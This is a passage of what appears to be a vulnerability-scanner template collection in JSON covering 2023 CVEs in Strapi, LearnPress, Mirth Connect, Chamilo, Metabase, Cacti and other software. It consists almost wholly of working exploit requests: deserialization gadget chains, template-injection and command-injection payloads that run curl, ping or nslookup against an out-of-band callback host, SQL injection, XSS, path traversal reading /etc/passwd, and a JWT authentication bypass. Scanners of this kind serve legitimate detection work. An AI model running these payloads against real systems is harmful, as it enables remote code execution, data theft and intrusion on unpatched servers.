{{Hostname}}\nContent-Type: application/json\n\n{\"email\":\"{{email}}\",\"password\":\"{{password}}\"}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body, \"token\",\"isActive\")","contains(content_type, \"application/json\")"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"token","json":[".data.token"],"internal":true}]},{"raw":["PUT /users-permissions/advanced HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\nContent-Type: application/json\n\n{\"unique_email\":true,\"allow_register\":true,\"email_confirmation\":true,\"email_reset_password\":null,\"email_confirmation_redirection\":\"{{RootURL}}\",\"default_role\":\"authenticated\"}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body, \"ok\",\"true\")","contains(content_type, \"application/json\")"],"condition":"and","internal":true}]},{"raw":["PUT /users-permissions/email-templates HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\nContent-Type: application/json\n\n{\n  \"email-templates\": {\n    \"reset_password\": {\n      \"display\": \"Email.template.reset_password\",\n      \"icon\": \"sync\",\n      \"options\": {\n        \"from\": {\n          \"name\": \"Administration Panel\",\n          \"email\": \"no-reply@strapi.io\"\n        },\n        \"response_email\": \"\",\n        \"object\": \"Reset password\",\n        \"message\": \"<p>We heard that you lost your password. Sorry about that!</p>\\n\\n<p>But dont worry! You can use the following link to reset your password:</p>\\n<p><%= URL %>?code=<%= TOKEN %></p>\\n\\n<p>Thanks.</p>\"\n      }\n    },\n    \"email_confirmation\": {\n      \"display\": \"Email.template.email_confirmation\",\n      \"icon\": \"check-square\",\n      \"options\": {\n        \"from\": {\n          \"name\": \"Administration Panel\",\n          \"email\": \"no-reply@strapi.io\"\n        },\n        \"response_email\": \"\",\n        \"object\": \"Account confirmation\",\n        \"message\": \"<%= `${ process.binding('spawn_sync').spawn({\\\"file\\\":\\\"/bin/sh\\\",\\\"args\\\":[\\\"/bin/sh\\\",\\\"-c\\\",\\\"curl {{interactsh-url}}\\\"],\\\"stdio\\\":[{\\\"readable\\\":1,\\\"writable\\\":1,\\\"type\\\":\\\"pipe\\\"},{\\\"readable\\\":1,\\\"writable\\\":1,\\\"type\\\":\\\"pipe\\\"/*<>%=*/}]}).output }` %>\\n\\n<p><%= URL %>?confirmation=<%= CODE %></p>\\n\\n<p>Thanks.</p>\"\n      }\n    }\n  }\n}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body, \"ok\",\"true\")","contains(content_type, \"application/json\")"],"condition":"and","internal":true}]},{"raw":["POST /api/auth/local/register HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n    \"email\": \"{{address}}\",\n    \"username\": \"{{randstr_1}}\",\n    \"password\": \"{{randstr_2}}\"\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["ApplicationError"]},{"type":"word","part":"content_type","words":["application/json"]}]}]},{"id":"CVE-2023-26843","info":{"name":"ChurchCRM 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /session/begin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUser={{username}}&Password={{password}}\n","POST /NoteEditor.php?FamilyID=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nPersonID=0&FamilyID=1&NoteID=&NoteText=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&Submit=Save\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"><img src=x onerror=alert(document.domain)>\")","contains(body_2, \"ChurchCRM\")"],"condition":"and"}]}]},{"id":"CVE-2023-6634","info":{"name":"LearnPress < 4.2.5.8 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /wp-json/lp/v1/load_content_via_ajax/?callback={\"class\"%3a\"LP_Debug\",\"method\"%3a\"var_dump\"}&args=\"{{randstr}}\" HTTP/1.1\nHost: {{Hostname}}\n\n","GET /wp-json/lp/v1/load_content_via_ajax/?callback={%22class%22:%22LP_Helper%22,%22method%22:%22maybe_unserialize%22}&args=\"O%3a13%3a\\u0022WP_HTML_Token\\u0022%3a2%3a{s%3a13%3a\\u0022bookmark_name\\u0022%3bs%3a64%3a\\u0022curl+{{finalurl}}\\u0022%3bs%3a10%3a\\u0022on_destroy\\u0022%3bs%3a6%3a\\u0022system\\u0022%3b}\" HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n\n","GET /wp-json/lp/v1/load_content_via_ajax/?callback={\"class\":\"LP_Helper\",\"method\":\"maybe_unserialize\"}&args=\"O%3a8%3a\\u0022WP_Theme\\u0022%3a2%3a{s%3a7%3a\\u0022headers\\u0022%3bO%3a13%3a\\u0022WP_Block_List\\u0022%3a2%3a{s%3a6%3a\\u0022blocks\\u0022%3ba%3a1%3a{s%3a4%3a\\u0022Name\\u0022%3ba%3a1%3a{s%3a9%3a\\u0022blockName\\u0022%3bs%3a12%3a\\u0022Parent+Theme\\u0022%3b}}s%3a8%3a\\u0022registry\\u0022%3bO%3a22%3a\\u0022WP_Block_Type_Registry\\u0022%3a1%3a{s%3a22%3a\\u0022registered_block_types\\u0022%3bO%3a8%3a\\u0022WP_Theme\\u0022%3a2%3a{s%3a7%3a\\u0022headers\\u0022%3bN%3bs%3a6%3a\\u0022parent\\u0022%3bO%3a22%3a\\u0022WpOrg\\\\Requests\\\\Session\\u0022%3a3%3a{s%3a3%3a\\u0022url\\u0022%3bs%3a10%3a\\u0022http%3a//p%3a0\\u0022%3bs%3a7%3a\\u0022headers\\u0022%3ba%3a1%3a{i%3a0%3bs%3a64%3a\\u0022curl+{{finalurl}}\\u0022%3b}s%3a7%3a\\u0022options\\u0022%3ba%3a1%3a{s%3a5%3a\\u0022hooks\\u0022%3bO%3a20%3a\\u0022WpOrg\\\\Requests\\\\Hooks\\u0022%3a1%3a{s%3a5%3a\\u0022hooks\\u0022%3ba%3a1%3a{s%3a23%3a\\u0022requests.before_request\\u0022%3ba%3a1%3a{i%3a0%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bO%3a20%3a\\u0022WpOrg\\\\Requests\\\\Hooks\\u0022%3a1%3a{s%3a5%3a\\u0022hooks\\u0022%3ba%3a1%3a{s%3a15%3a\\u0022http%3a//p%3a0/Name\\u0022%3ba%3a1%3a{i%3a0%3ba%3a1%3a{i%3a0%3bs%3a6%3a\\u0022system\\u0022%3b}}}}i%3a1%3bs%3a8%3a\\u0022dispatch\\u0022%3b}}}}}}}}}}s%3a6%3a\\u0022parent\\u0022%3bN%3b}\" HTTP/1.1\nHost: {{Hostname}}\n\n"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_any(interactsh_protocol, 'http', 'dns')","contains(body, 'Error: data content invalid!')","contains(body_1, '<pre>{{randstr}}</pre>') ","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-0261","info":{"name":"WordPress WP TripAdvisor Review Slider <10.8 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\ncontent-type: application/x-www-form-urlencoded\n\naction=parse-media-shortcode&shortcode=[wptripadvisor_usetemplate+tid=\"1+AND+(SELECT+42+FROM+(SELECT(SLEEP(6)))b)\"]\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(content_type_2, \"application/json\")","contains(body_2, \"\\\"data\\\":{\")"],"condition":"and"}]}]},{"id":"CVE-2023-3849","info":{"name":"mooDating 1.2 - Cross-site scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/find-a-matchpksyk\"><img%20src%3da%20onerror%3dalert(document.cookie)>s9a64?"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains(body, \"><img src=a onerror=alert(document.cookie)>s9a64\") && contains(body, \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-0678","info":{"name":"PHPIPAM <v1.5.1 - Missing Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/functions/scripts/find_full_subnets.php"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"Array\", \"[subnet]\", \"[description]\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-37679","info":{"name":"NextGen Mirth Connect - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /api/server/version HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: OpenAPI\n","POST /api/users HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: OpenAPI\nContent-Type: application/xml\n\n<sorted-set>\n    <string>foo</string>\n    <dynamic-proxy>\n        <interface>java.lang.Comparable</interface>\n        <handler class=\"java.beans.EventHandler\">\n            <target class=\"java.lang.ProcessBuilder\">\n                <command>\n                    <string>curl</string>\n                    <string>http://{{interactsh-url}}/</string>\n                </command>\n            </target>\n            <action>start</action>\n        </handler>\n    </dynamic-proxy>\n</sorted-set>\n"],"matchers":[{"type":"dsl","dsl":["compare_versions(version, \"<4.4.1\")","contains(interactsh_protocol, \"dns\")","status_code_1 == 200 && status_code_2 == 500"],"condition":"and"}],"extractors":[{"type":"regex","part":"body_1","name":"version","group":1,"regex":["(.*)"],"internal":true}]}]},{"id":"CVE-2023-2356","info":{"name":"Mlflow <2.3.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /api/2.0/mlflow/registered-models/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{str}}\"}\n","POST /api/2.0/mlflow/model-versions/create HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"name\": \"{{str}}\", \"source\": \"file://{{Hostname}}/../../../../../../../\"}\n","GET /model-versions/get-artifact?path=etc/passwd&name={{str}}&version={{version}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["\"version\": \"([0-9.]+)\","],"internal":true,"part":"body"}]}]},{"id":"CVE-2023-2227","info":{"name":"Modoboa < 2.1.0 - Improper Authorization","severity":"critical"},"requests":[{"raw":["GET /api/v2/parameters/core/ HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: 7h3h4ckv157\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["label\":","default_password\":","authentication_type\":\"local"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35158","info":{"name":"XWiki - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/view/XWiki/Main?xpage=restore&showBatch=true&xredirect=javascript:alert(document.domain)"],"matchers":[{"type":"dsl","dsl":["contains(body, \"href=\\\"javascript:alert(document.domain)\\\">Cancel</a>\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-5863","info":{"name":"phpMyFAQ < 3.2.0 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["GET /admin/index.php?action=ngductung\"><img+src/onerror=\"alert(document.domain) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src/onerror=\"alert(document.domain)\">","phpMyFAQ"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34598","info":{"name":"Gibbon v25.0.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?q=./gibbon.sql"],"matchers-condition":"and","matchers":[{"type":"word","words":["phpMyAdmin SQL Dump","gibbon"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35159","info":{"name":"XWiki >= 3.4-milestone-1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain)","{{BaseURL}}/bin/deletespace/Sandbox/?xredirect=javascript:alert(document.domain)"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["javascript:alert(document.domain)","deletespace.Sandbox"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200,401]}]}]},{"id":"CVE-2023-4173","info":{"name":"mooSocial 3.1.8 - Reflected XSS","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/classified/%22%3E%3Cimg%20src=a%20onerror=alert('document.domain')%3E/search?category=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=a onerror=alert('document.domain')>","mooSocial"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2023-39361","info":{"name":"Cacti 1.2.24 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=%22or+%22%22%3D%22%28%28%22%29%29%3BSELECT+SLEEP%2810%29%3B--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=10","status_code == 200","contains_all(body, \"Tree Mode\", \"cacti\")"],"condition":"and"}]}]},{"id":"CVE-2023-33439","info":{"name":"Faculty Evaluation System v1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /ajax.php?action=login HTTP/1.1\nHost:{{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nemail={{username}}&password={{password}}&login=1\n","GET /admin/manage_task.php?id=1%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1\nHost:{{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"Fatal error:\")","contains(body, \"XPATH syntax error:\")"],"condition":"and"}]}]},{"id":"CVE-2023-39024","info":{"name":"Harman Media Suite <= 4.2.0 - Local File Disclosure","severity":"high"},"requests":[{"raw":["GET /userportal/api/rest/contentChannels/?startIndex=0&pageSize=4&sort=TIME&showType=all HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"plcm-content-channel\", \"privacy\", \"coverImage\")","contains(content_type, \"application/vnd.plcm.plcm-content-channel-list+json\")","status_code == 200"],"condition":"and","internal":true}],"extractors":[{"type":"regex","name":"channelId","group":1,"regex":["\"channelId\":\"([^\"]+)\""],"internal":true}]},{"raw":["GET /userportal/api/rest/contentChannels/{{channelId}}/archives/?startIndex=0&pageSize=15&sort=time&onlyIncludeApproved=true HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"callId\", \"displayName\", \"duration\")","contains(content_type, \"application/vnd.plcm.plcm-csc+json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-0600","info":{"name":"WP Visitor Statistics (Real Time Traffic) < 6.9 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Real Time Traffic"]}]},{"raw":["@timeout: 30s\nGET /?wmcAction=wmcTrack&siteId=34&url=test&uid=01&pid=02&visitorId={{str}}%27,sleep(6),0,0,0,0,0);--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"sleep(6)\")"],"condition":"and"}]}]},{"id":"CVE-2023-49103","info":{"name":"OwnCloud - Phpinfo Configuration","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/{{rand_base(4)}}.css","{{BaseURL}}/owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/{{rand_base(4)}}.css"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Extension","PHP Version","owncloud"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-29919","info":{"name":"SolarView Compact <= 6.00 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /texteditor.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ndirectory=%2F/etc&open=%8AJ%82%AD&r_charset=none&newfile=&editfile=%2Fhome%2Fcontec%2Fdata%2FoutputCtrl%2Fremote%2F2016%2F\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["action=\"texteditor.php\"","adduser.conf","deluser.conf"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30210","info":{"name":"OURPHP <= 7.2.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/client/manage/ourphp_tz.php?act=rt&callback=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","barmemCachedPercent","swapPercent"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-43208","info":{"name":"NextGen Healthcare Mirth Connect - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /api/server/version HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: OpenAPI\n","POST /api/users HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: OpenAPI\nContent-Type: application/xml\n\n<sorted-set>\n  <string>abcd</string>\n  <dynamic-proxy>\n    <interface>java.lang.Comparable</interface>\n    <handler class=\"org.apache.commons.lang3.event.EventUtils$EventBindingInvocationHandler\">\n      <target class=\"org.apache.commons.collections4.functors.ChainedTransformer\">\n        <iTransformers>\n          <org.apache.commons.collections4.functors.ConstantTransformer>\n            <iConstant class=\"java-class\">java.lang.Runtime</iConstant>\n          </org.apache.commons.collections4.functors.ConstantTransformer>\n          <org.apache.commons.collections4.functors.InvokerTransformer>\n            <iMethodName>getMethod</iMethodName>\n            <iParamTypes>\n              <java-class>java.lang.String</java-class>\n              <java-class>[Ljava.lang.Class;</java-class>\n            </iParamTypes>\n            <iArgs>\n              <string>getRuntime</string>\n              <java-class-array/>\n            </iArgs>\n          </org.apache.commons.collections4.functors.InvokerTransformer>\n          <org.apache.commons.collections4.functors.InvokerTransformer>\n            <iMethodName>invoke</iMethodName>\n            <iParamTypes>\n              <java-class>java.lang.Object</java-class>\n              <java-class>[Ljava.lang.Object;</java-class>\n            </iParamTypes>\n            <iArgs>\n              <null/>\n              <object-array/>\n            </iArgs>\n          </org.apache.commons.collections4.functors.InvokerTransformer>\n          <org.apache.commons.collections4.functors.InvokerTransformer>\n            <iMethodName>exec</iMethodName>\n            <iParamTypes>\n              <java-class>java.lang.String</java-class>\n            </iParamTypes>\n            <iArgs>\n              <string>nslookup {{interactsh-url}}</string>\n            </iArgs>\n          </org.apache.commons.collections4.functors.InvokerTransformer>\n        </iTransformers>\n      </target>\n      <methodName>transform</methodName>\n      <eventTypes>\n        <string>compareTo</string>\n      </eventTypes>\n    </handler>\n  </dynamic-proxy>\n</sorted-set>\n"],"matchers":[{"type":"dsl","dsl":["compare_versions(version, \"<4.4.1\")","contains(interactsh_protocol, \"dns\")","status_code_1 == 200 && status_code_2 == 500"],"condition":"and"}],"extractors":[{"type":"regex","part":"body_1","name":"version","group":1,"regex":["(.*)"],"internal":true}]}]},{"id":"CVE-2023-26035","info":{"name":"ZoneMinder Snapshots - Command Injection","severity":"critical"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["csrfMagicToken = \\\"(key:[a-f0-9]{40},\\d+)"],"internal":true}]},{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nview=snapshot&action=create&monitor_ids[0][Id]=;ping+{{interactsh-url}}&__csrf_magic={{csrf_token}}\n"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, \"dns\")"]}]}]},{"id":"CVE-2023-3845","info":{"name":"MooDating 1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/friends/ajax_invitej7hrg%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3ef26v4?mode=model"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"><img src=a onerror=alert(document.domain)>\", \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-0514","info":{"name":"Membership Database <= 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=member-database%2Flist_members.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=sort&where=id&operator=%3D&value=asd%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%2F%2F&sortBy=id&ascdesc=asc\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"Member Database\")"],"condition":"and"}]}]},{"id":"CVE-2023-3844","info":{"name":"MooDating 1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/friendsslty3%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3er5c3m/ajax_invite?mode=model"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"><img src=a onerror=alert(document.domain)>r5c3m\", \"mooDating\")"],"condition":"and"}]}]},{"id":"CVE-2023-4542","info":{"name":"D-Link DAR-8000-10 - Command Injection","severity":"critical"},"requests":[{"raw":["POST /app/sys1.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\n\ncmd=id\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-22893","info":{"name":"Strapi Versions <=4.5.6 - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /api/auth/cognito/callback?access_token={{to_lower(rand_text_alpha(8))}}&id_token=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.{{base64(payload)}}. HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"provider\":","\"confirmed\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"json","part":"body","name":"token","json":[".jwt"]}]}]},{"id":"CVE-2023-4547","info":{"name":"SPA-Cart eCommerce CMS 1.9.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search?filtered=1&q=test&filter[price]=100-1331\"><script>alert(document.cookie)</script>&filter[attr][Memory][]=16+GB","{{BaseURL}}/search?filter[brandid]=vnxjb\"><script>alert(document.cookie)</script>bvu51"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["100-1331\"><script>alert(document.cookie)</script>","><script>alert(document.cookie)</script>bvu51"],"condition":"or"},{"type":"word","part":"body","words":["<table class=\"products-nav\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-43472","info":{"name":"MLFlow < 2.8.1 - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/2.0/preview/mlflow/experiments/list"],"matchers":[{"type":"dsl","dsl":["contains_all(body, \"experiment_id\\\":\", \"artifact_location\\\":\", \"lifecycle_stage\\\":\")","contains(header, \"application/json\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-38646","info":{"name":"Metabase < 0.46.6.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /api/session/properties HTTP/1.1\nHost: {{Hostname}}\n","POST /api/setup/validate HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n   \"token\":\"{{token}}\",\n   \"details\":{\n      \"details\":{\n         \"subprotocol\":\"h2\",\n         \"classname\":\"org.h2.Driver\",\n         \"advanced-options\":true,\n         \"subname\":\"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '{{file}}'//\\\\;\"\n      },\n      \"name\":\"{{randstr}}\",\n      \"engine\":\"postgres\"\n   }\n}\n"],"extractors":[{"type":"json","part":"body_1","name":"token","json":[".[\"setup-token\"]"],"internal":true}],"matchers":[{"type":"dsl","dsl":["contains_any(body_2, \"Syntax error in SQL statement\",\"NoSuchFileException\")","status_code_2 == 400"],"condition":"and"}]}]},{"id":"CVE-2023-3368","info":{"name":"Chamilo LMS <= v1.11.20 Unauthenticated Command Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/main/webservices/additional_webservices.php"],"headers":{"Content-Type":"application/xml"},"body":"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:ns1=\"{{BaseURL}}\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:ns2=\"http://xml.apache.org/xml-soap\" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n  <SOAP-ENV:Body>\n    <ns1:wsConvertPpt>\n      <param0 xsi:type=\"ns2:Map\">\n        <item>\n          <key xsi:type=\"xsd:string\">file_data</key>\n          <value xsi:type=\"xsd:string\"></value>\n        </item>\n        <item>\n          <key xsi:type=\"xsd:string\">file_name</key>\n          <value xsi:type=\"xsd:string\">$(curl http://{{interactsh-url}}/)</value>\n        </item>\n        <item>\n          <key xsi:type=\"xsd:string\">service_ppt2lp_size</key>\n          <value xsi:type=\"xsd:string\">720x540</value>\n        </item>\n      </param0>\n    </ns1:wsConvertPpt>\n  </SOAP-ENV:Body>\n</SOAP-ENV:Envelope>\n","matchers-condition":"and","matchers":[{"type":"status","status":[200]},{"type":"word","words":["wsConvertPptResponse"],"part":"body"},{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2023-27584","info":{"name":"Dragonfly2 < 2.1.0-beta.1 - Hardcoded JWT Secret","severity":"critical"},"requests":[{"raw":["GET /api/v1/users HTTP/1.1\nHost: {{Hostname}}\nCookie: jwt={{generate_jwt(payload,\"HS256\",\"Secret Key\") }}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"created_at\":","\"updated_at\":","\"state\":"],"condition":"and"},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30534","info":{"name":"Cacti < 1.2.25 Insecure Deserialization","severity":"medium"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__csrf_magic={{url_encode(csrf_token)}}&action=login&login_username={{username}}&login_password={{password}}\n","POST /managers.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=actions&action_receiver_notifications=1&selected_items=a%3A2%3A%7Bi%3A7%3Ba%3A1%3A%7Bi%3A0%3BO%3A18%3A%22phpseclib%5CNet%5CSSH1%22%3A2%3A%7Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3BO%3A19%3A%22phpseclib%5CCrypt%5CAES%22%3A8%3A%7Bs%3A10%3A%22block_size%22%3BN%3Bs%3A12%3A%22inline_crypt%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A25%3A%22phpseclib%5CCrypt%5CTripleDES%22%3A6%3A%7Bs%3A10%3A%22block_size%22%3Bs%3A30%3A%221%29%7B%7D%7D%7D%3B+ob_clean%28%29%3Blsdie%28%29%3B+%3F%3E%22%3Bs%3A12%3A%22inline_crypt%22%3BN%3Bs%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3B%7Di%3A1%3Bs%3A26%3A%22_createInlineCryptFunction%22%3B%7Ds%3A16%3A%22use_inline_crypt%22%3Bi%3A1%3Bs%3A7%3A%22changed%22%3Bi%3A0%3Bs%3A6%3A%22engine%22%3Bi%3A1%3Bs%3A4%3A%22mode%22%3Bi%3A1%3Bs%3A6%3A%22bitmap%22%3Bi%3A1%3Bs%3A6%3A%22crypto%22%3Bi%3A1%3B%7D%7D%7Di%3A7%3Bi%3A7%3B%7D&drp_action=2&__csrf_magic={{url_encode(csrf_token)}}\n","GET /clog.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body_4","regex":["<table[^;]*;['\"]>\\s*(<tr 